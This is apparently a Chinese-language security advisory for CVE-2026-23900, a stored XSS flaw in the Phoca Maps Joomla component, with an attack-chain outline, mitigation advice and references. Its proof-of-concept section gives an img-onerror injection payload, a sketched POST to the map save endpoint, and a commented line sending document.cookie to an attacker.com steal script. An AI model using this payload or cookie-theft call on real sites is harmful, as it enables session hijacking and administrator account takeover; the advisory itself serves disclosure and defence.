CVE-2026-23900: Phoca Maps组件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-23900

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Phoca Maps

漏洞概述

Phoca Maps组件在版本5.0.0至6.0.2中存在严重的存储型跨站脚本（XSS）漏洞。该漏洞源于组件在处理地图和图标渲染逻辑时未对用户输入进行充分的过滤和转义。由于无需用户交互且无需认证即可触发，攻击者可以构造恶意Payload并存储在服务端。当管理员或普通用户浏览包含恶意代码的页面时，脚本将在受害者浏览器中自动执行，进而窃取敏感凭证、劫持用户会话或执行未授权操作。

技术细节

该漏洞属于存储型XSS（Stored XSS），其根本原因在于Phoca Maps组件在处理地图标记、图标名称或相关地理信息数据时，缺乏有效的输入验证和输出编码机制。攻击者可以在创建或编辑地图项目时，将JavaScript恶意代码注入到特定的字段中（如地图标题、描述或图标路径）。由于服务器端未对这些数据进行清洗，恶意脚本会被持久化存储在数据库中。当其他用户（特别是具有高权限的管理员）访问包含该地图数据的页面时，后端会从数据库读取并直接渲染这些未经过滤的内容到前端HTML中。浏览器解析HTML时，会执行其中的恶意脚本。攻击者利用此漏洞，可以绕过同源策略限制，通过document.cookie窃取管理员的Session ID，进而完全接管Joomla后台账户；或者利用AJAX请求执行未授权的后台管理操作。由于CVSS向量显示无需用户交互（UI:N）且无需认证（PR:N），该漏洞具有极高的自动化利用价值。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站使用了存在漏洞的Phoca Maps组件（版本5.0.0至6.0.2）。

STEP 2

武器化

攻击者构造恶意的JavaScript代码，并将其封装在适合注入的HTML标签中（如img标签的onerror事件）。

STEP 3

投递

攻击者利用无需认证的漏洞点，通过发送POST请求将恶意Payload注入到地图图标或描述字段中，数据被存储到数据库。

STEP 4

利用

当管理员或授权用户访问受感染的地图页面时，服务器从数据库读取未经过滤的数据并渲染到页面中。

STEP 5

执行与影响

受害者的浏览器解析并执行恶意脚本，攻击者借此窃取Session ID或执行管理员权限操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Proof of Concept for CVE-2026-23900
// Target: Phoca Maps Component 5.0.0 - 6.0.2
// Type: Stored XSS in Icon/Map Rendering

// 1. Construct the malicious payload to be injected into the Icon field or Map Description
var payload = '<img src=x onerror=alert("CVE-2026-23900-Stored-XSS")>';

// 2. Simulate the HTTP Request to inject the payload (Conceptual)
// The attacker sends a POST request to the component endpoint saving the map data.
/*
POST /index.php?option=com_phocamaps&task=map.save HTTP/1.1
Host: vulnerable-joomla-site.com
Content-Type: application/x-www-form-urlencoded

jform[title]=MyMap&jform[icon]=' + encodeURIComponent(payload) + '&...
*/

console.log("[+] Payload prepared: " + payload);
console.log("[+] Exploit trigger: Payload will execute when an admin views the map in the backend or frontend.");

// 3. Malicious action (Cookie Theft example)
// var img = new Image();
// img.src = "http://attacker.com/steal.php?c=" + document.cookie;

影响范围

Phoca Maps 5.0.0 - 6.0.2

防御指南

临时缓解措施

建议立即更新Phoca Maps组件至修复版本。如果无法立即升级，应暂时禁用该组件的公开访问功能，或限制特定IP地址的访问，直到完成修复。同时，管理员应检查系统日志中是否存在异常的地图修改记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-23900
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-23900
3 Details https://www.cvedetails.com/cve/CVE-2026-23900/
4 VulDB https://vuldb.com/cve/CVE-2026-23900
5 Link https://phoca.cz/